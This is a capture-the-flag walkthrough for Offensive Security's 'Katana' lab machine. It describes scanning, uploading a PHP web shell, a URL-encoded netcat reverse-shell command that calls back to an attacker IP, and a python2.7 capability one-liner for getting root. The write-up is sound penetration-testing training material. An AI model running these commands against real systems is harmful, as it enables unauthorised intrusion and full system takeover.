KATANA has been PWNED!!!! — Offensive Security
This is one of the proving ground from Offensive Security and marked as easy machine. So let’s pwn this machine
ENUMERATION
Starting of with scanning with open service and ports
Highlighting all these is a good practice ;-) . So found some ports and numerous http services. So as there are numerous, so using nikto will be my last approach.
Brute forcing web directories on different ports.
gobuster.txt is for port 80
gobuster8088.txt is for port 8088
gobusterdir.txt is for dir brute on port 80
gobusterdir8088.txt is for dir brute on port 8088
And surprisingly I found upload.html and then without furthur ado i used one line php payload and waited for 1 minute as per the web page instructions. During the initial recon there were many http services running, I then hop over to port 8715 with uploaded file location url i.e Suppose the uploaded file name is cmd.php, so the encoded payload will be :
http%3A%2F%2F192.168.100.131%3A8715%2Fkatana_cmd.php%3Fcmd%3Dnc%20-e%20%2Fbin%2Fsh%20192.168.100.128%209999
As my shell was listening on this port and YES!!! we’re in!.
Privilege Escalations
Enumerating the target machine after gaining access, I looked for system capabilities and found empty capability (ep) over suid is given python2.7 for www-data that means all privilege is assigned to www-data for that program, therefore taking advantage of this permission I can escalate into high privilege from low privilege shell using the command below.
python2.7 -c 'import pty;import os;os.setuid(0);pty.spawn("/bin/dash")'
And we are now root!!! and found a flag ;-)
— — — — — — — — — — — — — — — — — — — — — — — -
Let me know if you face any issues
================
That’s all for now,
Until Next Time,
You are Awesome!!!
— — — — — — — — — — — — —